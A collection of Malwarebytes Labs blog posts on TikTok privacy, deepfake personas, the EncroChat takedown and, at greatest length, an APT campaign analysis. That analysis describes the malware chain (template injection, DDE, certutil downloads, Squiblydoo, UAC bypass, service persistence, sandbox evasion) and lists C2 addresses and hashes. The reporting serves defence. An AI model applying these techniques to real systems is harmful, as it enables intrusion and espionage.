IT News

In recent news retail giant Amazon sent a memo to employees telling them to delete the popular social media app TikTok from their phones. In the memo it stated that the app would pose a security risk without going into details. Later the memo was withdrawn without an explanation except that it was sent in error. Are we curious yet, my dear Watson?

What is TikTok

For those of us that can’t tell one social media app from another, TikTok is one of the most popular ones and it was especially designed to allow users to upload short video’s for others to like and share. Functionality has grown from a basic lip-sync app to host a wide variety of short video clips. It is predominantly popular among a younger audience. Most of the users are between 13 and 24 years old. In the first quarter of 2019, TikTok was the most downloaded app in the App Store, with over 33 million installs. TikTok is owned by a Chinese tech company called ByteDance.

Nation states’ attention

This wasn’t the first time TikTok faced removal from a number of devices. India already banned TikTok. And the USA and Australia are also considering blocking the app. In fact, In December, the US Army banned TikTok from its phones, and in March, US senators proposed a bill that would block TikTok from all government devices.

Is TikTok safe?

For starters, TikTok being a Chinese product does not help. A number of Chinese apps and software packages have been under investigation and were found to be “calling home”. Now this does not automatically they are spying on you, but when you start your investigation with a negative expectation, you are inclined to see it as such. And gathering information about a client without their consent is wrong.

The fact that TikTok is different in China itself, where it goes under the name Douyin, is another factor. But this could be explained away as well as China has a reputation of spying on its population. So maybe the foreign version is less intrusive then the domestic one. And some governments have their own reasons not to trust anything from Chinese origin or another agenda to boycott products originating from China.

Adding to the suspicion a Reddit user by the handle of bangorlol posted comments about the data found to be sent home when he reverse-engineered the app. The same user has started a thread on reddit where he wishes to cooperate with other reverse-engineers on newer versions of the app. One type of behavior that was confirmed by another source is that the app copies information from the clipboard. Which certainly is something that goes above and beyond what other social media apps do.

TikTok’s defense

TikTok’s main defense consists of the fact that most of their senior staff are outside of China. On their blog they also specified where their data are stored and that the data are not subject to Chinese law.

“TikTok is led by an American CEO, with hundreds of employees and key leaders across safety, security, product, and public policy here in the US. We have never provided user data to the Chinese government, nor would we do so if asked.”

Options to ban TikTok completely

Besides organizations like Wells Fargo and some branches of the US military asking their employees to refrain using the app on devices that also contain data about the organization, we have also seen countries advocating a total ban of the app. But this is not an easy goal to achieve and could also prove to be ineffective.

For a total ban of an app you would have to get it removed from the official playstores. This is harder to achieve for some countries than for others. India banned TikTok along with 58 other Chinese apps. The US government would have to find a legally sound reason to request that Apple and Google pull TikTok from their app stores and would probably meet with a lot of resistance.

Besides if people want to install a popular app like TikTok there are many other sources. Downloads are not limited to the official playstores, so a determined user will be able to find the app elsewhere. And it does not stop the millions of active users from continuing to use the app.

Another option is to give TikTok the same treatment as was handed to Huawei. Put them on the Commerce Departments’ entity list which would deny them access to US technology. Given the circumstances that doesn’t accomplish much more than denying them access to the playstores with the same consequences as we discussed above.

Social media and privacy

We have warned many times against posting privacy sensitive information on social media and guiding you and your children to use social media in a safe way. We even posted a guide for those that wanted to remove themselves from the major social media.

But when the social media app itself is determined to mine your data it becomes a whole different story. We have seen no conclusive proof that this is true for TikTok, but some of the allegations are very serious and seem to be supported by facts and authoritative research.

Other analysts discarded the researchers’ findings as jumping to conclusions. On thing is for sure: a full analysis without the help of the developers will take a lot of effort and time and even then, the results may still be disputable. At this point we can not be sure whether the TikTok app is spying on its users in a way that goes deeper than we might expect from an ordinary social media app.

All we can do at this point is to inform our users about the ongoing discussion and maybe explain some of the points that are being brought up. We also feel the need to repeat our warnings about the difficult relationship between social media and privacy. Obviously if any concrete facts should surface we will keep you posted.

Stay safe everyone!

The post TikTok is being discouraged and the app may be banned appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, our Lock and Code podcast delved into Bluetooth and beacon technology. We also dug into APT groups targeting India and Hong Kong, covered a law enforcement bust, and tried to figure out when, exactly, a Deepfake is a Deepfake.

Other cybersecurity news

• Insecure email addresses resulted in big-bucks sporting targets (Source: Silicon)
• What do you do when a lack of backups meets a ransomware attack? (Source: Help Net Security)
• Time to go underground: A study of what makes two leaked carding forums tick (Source: Sage Journals – access may be required)
• Twitter provided an update on the latest compromise-related happenings (Source: Twitter)
• Insurer “wins” the worst prize imaginable, in the form of the first charge under new cybersecurity rule violations (Source: The Register)
• Google cloud services were misused by phishers (Source: IT Pro Portal)
• An Apple co-founder was not impressed at how his image was being used on YouTube videos to push scams (Source: BBC)
• FullFact provided a roundup of scams which exist, and scams which do exist, but not quite in the way you might think (Source: Full Fact)
• Thieves in Europe found a new way to empty out ATM cash machines. (Source: Wired)
• BlackRock, a new Android malware, was found stealing critical information, from bank accounts and other login credentials. (Source: Jagran Josh)

Stay safe!

The post A week in security (July 20 – 26) appeared first on Malwarebytes Labs.

Subversive deepfakes that enter the party unannounced, do their thing, then slink off into the night without anybody noticing are where it’s at. Easily debunked clips of Donald Trump yelling THE NUKES ARE UP or something similarly ludicrous are not a major concern. We’ve already dug into why that’s the case.

What we’ve also explored are the people-centric ways you can train your eye to spot stand-out flaws and errors in deepfake imagery—essentially, GANS (generative adversarial networks) gone wrong. There will usually be something a little off in the details, and it’s up to us to discover it.

Progress is being made in the realm of digital checking for fraud, too, with some nifty techniques available to see what’s real and what isn’t. As it happens, a story is in the news which combines subversion, the human eye, and even a splash of automated examination for good measure.

A deepfake letter to the editor

A young chap, “Oliver Taylor” studying at the University of Birmingham found himself with editorials published in major news sources such as Time of Israel and Jerusalem Post, with his writing “career” apparently  kicking into life in late 2019, with additional articles in various places throughout 2020.

After a stream of these pieces, everything exploded in April when a new article from “Taylor” landed making some fairly heavy accusations against a pair of UK-based academics.

After the inevitable fallout, it turned out that Oliver Taylor was not studying at the University of Birmingham. In fact, he was apparently not real at all and almost all online traces of the author vanished into the ether. His mobile number was unreachable, and nothing came back from his listed email address.

Even more curiously, his photograph bore all the hallmarks of a deepfake (or, controversially, not a “deepfake” at all; more on the growing clash over descriptive names later). Regardless of what you intend to class this man’s fictitious visage as, in plain terms, it is an AI-generated image designed to look as real as possible.

Had someone created a virtual construct and bided their time with a raft of otherwise unremarkable blog posts simply to get a foothold on major platforms before dropping what seems to be a grudge post?

Fake it to make it

Make no mistake, fake entities pushing influential opinions is most definitely a thing. Right leaning news orgs have recently stumbled into just such an issue. Not so long ago, an astonishing 700 pages with 55 million followers were taken down by Facebook in a colossal AI-driven disinformation blowout dubbed “Fake Face Swarm.” This large slice of Borg-style activity made full use of deepfakes and other tactics to consistently push political messaging with a strong anti-China lean.

Which leads us back to our lone student, with his collection of under-the-radar articles, culminating in a direct attack on confused academics. The end point—the 700 pages worth of political shenanigans and a blizzard of fake people—could easily be set in motion by one plucky fake human with a dream and a mission to cause aggravation for others.

How did people determine he wasn’t real?

Tech steps up to the plate

A few suspicions, and the right people with the right technology in hand, is how they did it. There’s a lot you can do to weed out bogus images, and there’s a great section over on Reuters that walks you through the various stages of detection. No longer do users have to manually pick out the flaws; technology will (for example) isolate the head from the background, making it easier to see frequently distorted flaws. Or perhaps we can make use of heatmaps generated by algorithms to highlight areas most suspected of digital interference.

Even better, there are tools readily available which will give you the under-the-hood summary of what’s happening with one image.

Digging in the dirt

If you edit a lot of photographs on your PC, you’re likely familiar with EXIF metadata. This is a mashing together of lots of bits of information at the moment the photo is taken. Camera/phone type, lens, GPS, colour details—the sky’s the limit. On the flipside, some of it, like location data, can potentially be a privacy threat so it’s good to know how to remove it if needs be.

As with most things, it really depends what you want from it. AI-generated images are often no different.

There are many ways to stitch together your GAN imagery. This leaves traces, unless you try to obfuscate it or otherwise strip some information out. There are ways to dig into the underbelly of a GAN image, and bring back useful results.

Image swiping: often an afterthought

Back in November 2019, I thought it would be amusing if the creators of “Katie Jones” had just lazily swiped an image from a face generation website, as opposed to agonising over the fake image details.

For our fictitious university student, it seems that the people behind it may well have done just that [1], [2]. The creator of the site the image was likely pulled from has said they’re looking to make their images no longer downloadable, and/or place people’s heads in front of a 100 perceNT identifiably fake background such as “space.” They also state that “true bad actors will reach for more sophisticated solutions,” but as we’ve now seen in two high-profile cases, bad actors with big platforms and influential reach are indeed just grabbing whatever fake image they desire.

This is probably because ultimately the image is just an afterthought; the cherry on an otherwise bulging propaganda cake.

Just roll with it

As we’ve seen, the image wasn’t tailor-made for this campaign. It almost certainly wasn’t at the forefront of the plan for whoever came up with it, and they weren’t mapping out their scheme for world domination starting with fake profile pics. It’s just there, and they needed one, and (it seems) they did indeed just grab one from a freely-available face generation website. It could just as easily have been a stolen stock model image, but that is of course somewhat easier to trace. 

And that, my friends, is how we end up with yet another subtle use of synthetic technology whose presence may ultimately have not even mattered that much.

Are these even deepfakes?

An interesting question, and one that seems to pop up whenever a GAN-generated face is attached to dubious antics or an outright scam. Some would argue a static, totally synthetic image isn’t a deepfake because it’s a totally different kind of output.

To break this down:

1. The more familiar type of deepfake, where you end up with a video of [movie star] saying something baffling or doing something salacious, is produced by feeding a tool multiple images of that person. This nudges the AI into making the [movie star] say the baffling thing, or perform actions in a clip they otherwise wouldn’t exist in. The incredibly commonplace porn deepfakes would be the best example of this.
2. The image used for “Oliver Taylor” is a headshot sourced from a GAN which is fed lots of images of real people, in order to mash everything together in a way that spits out a passable image of a 100 percent fake human. He is absolutely the sum of his parts, but in a way which no longer resembles them.

So, when people say, “That’s not a deepfake,” they’re wanting to keep a firm split between “fake image or clip based on one person, generated from that same person” versus “fake image or clip based on multiple people, to create one totally new person.”

The other common negative mark set against calling synthetic GAN imagery deepfakes, is that the digital manipulations are not what make it effective. How can it be a deepfake if it wasn’t very good?

Call the witnesses to the stand

All valid points, but the counterpoints are also convincing.

If we’re going to dismiss their right to deepfake status because digital manipulations are not effective, then we’re going to end up with very few bona-fide deepfakes. The digital manipulations didn’t make it effective, because it wasn’t very good. By the same token, we’d never know if digital manipulations haven’t made a good one because we’d miss it entirely as it flies under the radar.

Even the best movie-based variants tend to contain some level of not-quite-rightness, and I have yet to place a bunch before me where I couldn’t spot at least nine out of 10 GAN fakes mixed in with real photos.

As interesting and as cool as the technology is, the output is still largely a bit of a mess. From experience, the combo of a trained eye and some of the detection tools out there make short work of the faker’s ambitions. The idea is to do just enough to push whatever fictional persona/intent attached to the image is over the line and make it all plausible—be it blogs, news articles, opinion pieces, bogus job posting, whatever. The digital fakery works best as an extra chugging away in the background. You don’t really want to draw attention to it as part of a larger operation.

Is this umbrella term a help or a hindrance?

As for keeping the tag “deepfake” away from fake GAN people, while I appreciate the difference in image output, I’m not 100 percent sure that this is necessarily helpful. The word deepfake is a portmanteau of “deep learning” and “fake.” Whether you end up with Nicolas Cage walking around in The Matrix, or you have a pretend face sourced from an image generation website, they’re both still fakes borne of some form of deep learning.

The eventual output is the same: a fake thing doing a fake thing, even if the path taken to get there is different. Some would argue this is a potentially needless and unnecessary split/removal of a catch-all definition which manages to helpfully and accurately apply to both above—and no doubt other—scenarios.

It would be interesting to know if there’s a consensus in the AI deep learning/GAN creation/analyst space on this. From my own experience talking to people in this area, the bag of opinions is as mixed as the quality from GAN outputs. Perhaps that’ll change in the future.

The future of fakery detection

I asked Munira Mustaffa, Security Analyst, if automated detection techniques would eventually surpass the naked eye forever:

I’ve been mulling over this question, and I’m not sure what else I could add. Yes, I think an automated deepfake checking can probably make better assessment than the human eye eventually. However, even if you have the perfect AI to detect them, human review will always be needed. I think context also matters in terms of your question. If we’re detecting deepfakes, what are we detecting against?

I think it’s also important to recognise that there is no settled definition for what is a deepfake. Some would argue that the term only applies to audio/videos, while photo manipulations are “cheapfakes”. Language is critical. Semantics aside, at most, people are playing around with deepfakes/cheapfakes to produce silly things via FaceApp. But the issue here is really not so much about deepfakes/cheapfakes, but it is the intent behind the use. Past uses have indicated how deepfakes have been employed to sway perception, like that Nancy Pelosi ‘dumbfake’ video.

At the end of the day, it doesn’t matter how sophisticated the detection software is if people are not going to be vigilant with vetting who they allow into their network or who is influencing their point of view. I think people are too focused on the concept that deepfakes’ applications are mainly for revenge porn and swaying voters. We have yet to see large scale ops employing them. However, as the recent Oliver Taylor case demonstrated to us, deepfake/cheapfake applications go beyond that.

There is a real potential danger that a good deepfake/cheapfake that is properly backstopped can be transformed into a believable and persuasive individual. This, of course, raises further worrying questions: what can we do to mitigate this without stifling voices that are already struggling to find a platform?

We’re deepfakes on the moon

We’re at a point where it could be argued deepfake videos are more interesting conceptually than in execution. MIT’s Centre for Advanced Virtuality has put together a rendition of the speech Richard Nixon was supposed to give if the moon landing ended in tragedy. It is absolutely a chilling thing to watch; however, the actual clip itself is not the best technically.

The head does not play well with the light sources around it, the neckline of the shirt is all wrong against the jaw, and the voice has multiple digital oddities throughout. It also doesn’t help that they use his resignation speech for the body, as one has to wonder about the optics of shuffling papers as you announce astronauts have died horribly.

No, the interesting thing for me is deciding to show the deceptive nature of deepfakes by using a man who was born in 1913 and died 26 years ago. Does anyone under the age of 40 remember his look, the sound of his voice outside of parody and movies well enough to make a comparison? Or is the disassociation from a large chunk of collective memory the point? Does that make it more effective, or less?

I’m not sure, but it definitely adds weight to the idea that for now, deepfakes—whether video or static image—are more effective as small aspects of bigger disinformation campaigns than attention drawing pieces of digital trickery.

See you again in three months?

It’s inevitable we’ll have another tale before us soon enough, explaining how another ghostly entity has primed a fake ID long enough to drop their payload, or sow some discord at the highest levels. Remember that the fake imagery is merely one small stepping stone to an overall objective and not the end goal in and of itself. It’s a brave new world of disruption, and perhaps by the time you’re pulling up another chair, I might even be able to give you a definitive naming convention.

The post Deepfakes or not: new GAN image stirs up questions about digital fakery appeared first on Malwarebytes Labs.

Due to the level of sophistication of the attack, and the malware code, we can no longer guarantee the security of your device.

This text caused a lot of aggravation, worries, and sleepless nights. No one wants to hear the security of their device has been compromised by a malware attack. The good news is that the actual victims of this malware attack were almost exclusively criminals. The bad news is that the message was sent out by a provider called EncroChat, which had previously billed itself as private as an in-person conversation in a soundproof room.

EncroChat provides customers with secure messaging and cryptophones. Their cryptophones run on the OTR operating system. Short for Off-The-Record, OTR is a cryptographic protocol that provides both authentication and end-to-end encryption for instant messaging. This protocol ensures that session keys will not be compromised even if the private key of the server is compromised. Even when a server is seized, the conversations cannot be decrypted or lead back to the participants.

What happened to EncroChat?

EncroChat, a company based in the Netherlands, advertises their services as safer than safe, stating that no messages are saved on their servers, which are located “offshore.” But at some point, Dutch law enforcement figured out the EncroChat servers were located in France and got to work, hoping to catch criminals in the act.

Decryption specialists that had been involved in the Ennetcom (Canada) and PGP Safe (Costa Rica) cases were consulted and managed to access the EncroChat systems—their method of access is still unknown to the public. When asked how they managed to follow conversations on EncroChat, Netherlands’ Team High Tech Crime chose not to answer. They may have hopes to use the method again in the future with another service.

Based on the information disclosed by EncroChat, it is likely that law enforcement agencies managed to install software on the servers that provided the phones with updates or delivered malware to the phones in another form. Either way, infecting devices allowed them to see the unencrypted messages. In essence, with enough infected devices, law enforcement was able to follow conversations in real time.

The warning that EncroChat sent out said:

They repurposed our domains to launch an attack to comprise carbon units. With control of our domain they managed to launch a malware campaign against the carbon to weaken its security.

Another clue supporting this takeaway was the fact that some users complained that the wipe function no longer worked, an indication that the malware was active at the device level.

What happened to EncroChat users?

Hundreds of arrests have already been made in the UK, the Netherlands, France, the Middle East, and a few other countries. On top of that, law enforcement has millions of chat messages that can lead to more arrests or serve as evidence in upcoming lawsuits. International drug traffickers have been hit especially hard by the service going bust.

But law enforcement’s move to access encrypted conversations sets up a dangerous precedent. Likely, the police had to act immediately on information that was potentially life threatening. However, without knowledge on how or why they breached the EncroChat system, their actions made encrypted chat users and operators suspicious about a possible leak. A criminal in the UK was confronted with an EncroChat message dating back to the end of 2019, so law enforcement agencies must have been monitoring the service for many months before users found out the system was compromised.

Why were so many criminals using EncroChat?

The EncroChat system was well organized and had gained a lot of trusting users over the years. Criminals felt secure enough to chat freely about everything: names of customers, drug deliveries, and even assassinations. And their trust was understandable, given what EncroChat had to offer:

• Phones were dual boot, so users could alternatively start the Android operating system and their phones would look like a normal, old-fashioned model.
• The phones had a “wipe all” button that would delete all the stored conversations in case of an arrest or other emergency.
• No messages were stored on servers so they could not be seized and decrypted later.
• OTR, unlike PGP, cannot be fully reconstructed even if you have both encryption keys.

EncroChat users paid hefty fees for this service— thousands of dollars per year, per device. The exorbitant fees may explain why the majority of the EncroChat clientele could be found on the wrong side of the law. Other parties that might have a vested interest in keeping their chat messages secret include government parties, journalists, security professionals, or lawyers. However, there are cheaper, if somewhat less sophisticated, alternatives for legitimate secret-keeping that law enforcement does not target.

After law enforcement agencies had taken down or compromised other providers, many European criminals flocked to EncroChat. An estimate by the French police indicated that 90 percent of the EncroChat users were engaged in criminal activity. However, of the 60,000 EncroChat end users, only 800 were arrested.

Encryption and law enforcement

Dutch law enforcement’s ability to breach EncroChat supports our point that the police don’t need built-in backdoors to catch criminals. Governments have asked for both means of observing data in transit, as well as retrieving data at rest on devices of interest. Looking at this case, we doubt that criminals would have chatted so freely about their activities had they known there was a backdoor—or even the capability of a backdoor—somewhere in the system.

But providing law enforcement with free access into platforms of their choosing is a slippery slope. For one, hacking into a secure platform puts all users’ information in jeopardy. Despite the intel on criminal activity in EncroChat, there are still legitimate users whose private messages are now compromised. In addition, where should law enforcement draw the line? How many other encryption platforms will they compromise before users have nowhere to turn? And at what point will law enforcement make an assumption of guilt just because someone is using encrypted chat?

Time and again law enforcement agencies have demonstrated that even if they can’t keep up with every new security development, at some point they catch up and find a way around it. And when they do, the harvest is huge. In this case, police departments will have years of investigating ahead of them if they plan to follow up on the millions of messages they intercepted. They may also find that because of their means of access, many data points may be inadmissible in court.

Thankfully, breaking encryption is not easy, especially when the encryption routine is without flaw. And these flaws will be a rare find when it comes to algorithms with track records like PGP and OTR. Finding a way to break the encryption will depend on a flaw in the implementation. Or finding a way to intercept messages before the encryption on the sender’s end or after the encryption on the receiver’s end.

Our hope is that law enforcement exhaust all other avenues of reconnaissance and investigation before moving to put the privacy of an entire platform of users in jeopardy. For now, legitimate users of end-to-end encryption programs needn’t worry about their company secrets or other confidential whisperings getting out. But for the potentially thousands of criminal EncroChat users that haven’t been arrested yet—time to worry.

The post EncroChat system eavesdropped on by law enforcement appeared first on Malwarebytes Labs.

This blog post was authored by Hossein Jazi and Jérôme Segura

On July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike.

One day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.

On July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK’s prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.

Considering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.

Active targeting with different lures

We were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.

‘Mail security check’ with Cobalt Strike (variant 1)

This campaign was most likely carried out through spear phishing emails. The .rar file (Mail security check.rar) includes a document with the same name (Figure 1).

The document uses template injection to download a remote template from the following URL (Figure 2).

The downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document’s content (Figure 3).

After decoding, we can see the list of commands that will be executed by DDE:

As Figure 4 shows, the threat actors used certutil with -urlcache -split -f parameters to download a com scriptlet from its server and then used the Squiblydoo technique to execute the downloaded scriptlet via regsvr32.exe on the victim machine.

This scriptlet is stored in the Documents directory as “ff.sct”. The scriptlet is an XML file that has embedded VBscript (Figure 5).

The scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanism and is responsible for injecting the embedded payload into rundll32.exe using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike.

The following diagram shows the overall process of this attack:

‘Mail security check’ with MgBot (variant 2)

As we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload.

Figure 7 shows the new encoded commands embedded within the template file.

Figure 8 shows the list of commands that will be executed by DDE.

In this new template file, the storm.sct scriptlet was replaced with storm.txt. Similar to the previous version, certutil is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.

The following diagram shows the overall execution process:

“Boris Johnson Pledges to Admit 3 Million From Hong Kong” with MgBot (variant 3)

The last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named “Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar”.

This document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10).

Similar to the other documents, it also uses template injection to download the remote template (Figure 11).

The downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in which it uses DDE to download and drop its loader.

Payload analysis: MgBot (BLame, Mgmbot)

The dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a Realtek Audio Manager tool (Figure 12).

It has four embedded resources in which two of them are in Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group.

The loader starts its process by escalating privilege through a UAC bypass using the CMSTPLUA COM interface.

MgBot uses several anti-analysis and anti-virtualization techniques. The code is self modifying which means it alters its code sections during runtime. This makes static analysis of the sample harder.

MgBot tries to avoid running in known virtualized environment such as VmWare, Sandboxie and VirtualBox. To identify if it’s running in one of these environments, it looks for the following DLL files: vmhgfs.dll, sbiedll.dll and vboxogl.dll and if it finds any of these DLLs, it goes to an infinite loop without doing any malicious activity (Figure 14).

It also checks for the presence of security products on the victim’s machine and takes a different execution flow if a security product is detected. For example, it checks for zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe in different parts of the code (Figure 15). The malware does not perform all the checks at once and it rather checks a couple of them at different steps of its execution.

To invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table.

As an example, when the malware needs to invoke WinExec, it does so by invoking it through its index from the function pointer table.

After building the required API calls table, the malware performs the following procedures:

• It calls CreateFileW to create iot7D6E.tmp (random name starting with iot) into the %APPDATA%Temp directory. This tmp file is a cab file that embedds the final payload.
• It calls WriteFile to populate its content
• It calls CreateProcessInternalW to invoke expand.exe to decompress the content of iot7D6E.tmp into ProgramDataMicrosoftPlayReadyMSIBACF.tmptmp.dat (the MSIBACF.tmp directory name is generated randomly and starts with MSI and then is followed by a combination of random numbers and characters)

• It calls CopyFileW to copy tmp.dat into pMsrvd.dll
• It calls DeleteFileW to delete tmp.dat
• It drops DBEngin.EXE and WUAUCTL.EXE in the ProgramDataMicrosoftPlayReady directory. Both of these files are rundll32.exe that is used later to execute the dropped DLL.
• It modifies the registry hive of of HKLMSYSTEMCurrentControlSetServicesAppMgmt registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory which are the old and new registry hives for the mentioned registry location.

To load the dropped DLL (pMsrvd.dll) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:

Finally, it executes the dropped DLL by running net start AppMgmt. After loading the DLL, the Loader creates a cmd file (lgt*.tmp.cmd) in the %APPDATA%TEMP directory with the content shown in Figure 20. Then it executes it to delete the cmd file and loader from the victim’s machine.

We were able to identify several different variants of this loader. In general, all the variants drop the final payload using expand.exe or extrac32.exe and then use “net start AppMgmt” or “net start StiSvc” to execute the dropped DLL with one of the following configurations:

• svchost.exe -k netsvcs -p -s AppMgmt
• svchost.exe -k netsvcs
• svchost.exe -k imgsvc

The dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a Video Team Desktop App.

The creation time for this DLL appears to be “2008-04-26 16:41:12”. However, based on Rich header data, we can assert that this might have been tampered with by the threat actor.

The DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe.

It uses several anti-debugging and anti-virtualization techniques to detect if it’s running in a virtualized environment or if it is being debugged by a debugger. It uses GetTickCount and QueryPerformanceCounter API calls to detect the debugger environment.

To detect if it is running in a virtual environment, it uses anti-vm detection instructions such as sldt and cpid that can provide information about the processor and also checks Vmware IO ports (VMXH).

All the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard.

This final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as:

• C2 communication over TCP (42.99.116[.]225:12800)
• Ability to take screenshots
• Keylogging
• File and directory management
• Process management
• Create MUTEX

Infrastructure relations

The following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.

What is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.

Android RAT

We also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as Android/Trojan.Spy.AndroRat.KSRemote.

All these bogus applications contain a jar file named ksremote.jar that provides the RAT functionality:

• Recording screen and audio using the phone’ss camera/mic
• Locating phone with coordinates
• Stealing phone contacts, call log, SMS, web history
• Sending SMS messages

This RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong)

• 122.10.89[.]172:10560
• 122.10.89[.]170:9552
• 122.10.89[.]172:10560

TTPs in line with Chinese APTs

The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.

The TTPs observed in these attacks have been used by several Chinese APT groups:

• Rancor APT is known to use Certutil to download their payload
• KeyBoy is known to have used DDE is its previous campaigns
• APT40 has utilized Squiblydoo and template injection in its previous campaigns.

Considering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.

A threat actor with a long documented history

A Needle in a haystack blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used CVE-2012-0158 to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign.

In 2018, this group performed another operation in which they used a VBScript vulnerability (CVE-2018-8174) to initiate their attack to drop a variants of MgBot. In March 2020, an archive file (warning.rar) was submitted to VirusTotal that we believe is part of another campaign used by this actor.

We will continue this group’s activities to see if their targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.

MITRE ATT&CK techniques

Tactic	ID	Name	Details
Execution	T1059	Command-Line Interface	Starts CMD.EXE for commands execution
	T1106	Execution through Module Load	Loads dropped or rewritten executable – WUAUCTL.EXE –  svchost.exe –  rundll32.exe
	T1053	Rundll32	Uses RUNDLL32.EXE to load library
	T1064	Scripting	WScript.exe: Starts MSHTA.EXE for opening HTA or HTMLS files
	T1035	service execution	Starts NET.EXE for service management
	T1170	mshta	Starts MSHTA.EXE for opening HTA or HTMLS files
	T1086	PowerShell	Executes PowerShell scripts
Privilege Escalation	T1050	new service	Creates or modifies windows services through rundll32.exe
	T1088	Bypass UAC	Known privilege escalation attack through  DllHost.exe
Persistence	T1031	Modify Existing Service	Creates or modifies windows services through rundll32.exe
	T1050	new services	Creates or modifies windows services through rundll32.exe
Defense Evasion	T1107	File Deletion	Starts CMD.EXE for self-deleting
	T1085	Rundll32	Uses RUNDLL32.EXE to load library
	T1088	bypass UAC	Known privilege escalation attack through  DllHost.exe
	T1497	Virtualization/Sandbox Evasion	The Loader uses several anti-virtualization detections techniques
	T1221	Template Injection	Maldoc uses template injection to download remote template
	T1218	Signed Binary Proxy Execution	Use Squiblydoo to load executable
Discovery	T1012	Query Registry	Reads the machine GUID from the registry
	T1082	System Information Discovery	Reads the machine GUID from the registry
	T1007	System Service Discovery	Starts NET.EXE for service management
Lateral Movement	T1105	Remote File Copy	– certutil.exe: Downloads executable files from the Internet – cmd.exe: Starts CertUtil for downloading files
C&C	T1105	Remote File Copy	– certutil.exe: Downloads executable files from the Internet  – cmd.exe: Starts CertUtil for downloading files

IOCs

2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx

fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc BNOHK.docx.zip

3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790 Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03 Email security check.rar

1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6 Email security check.docx

3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b ADIN.docx (storm.sct)

855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8 ADIN.docx (storm.sct)

1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 ff.exe (storm.txt)

99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a cobalt strike

flash.governmentmm.com: This domain used by actor to host remote templates. It has been registered 3 month ago by someone in United States.

MgBot samples

2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0
e224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468
5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f
1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585
07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f
7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6
8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4
f41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2

45.77.245[.]0: This IP has been used by Cobalt Strike as a C&C server.

42.99.116[.]225: C&C server used by final Payload.

Android samples

b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77
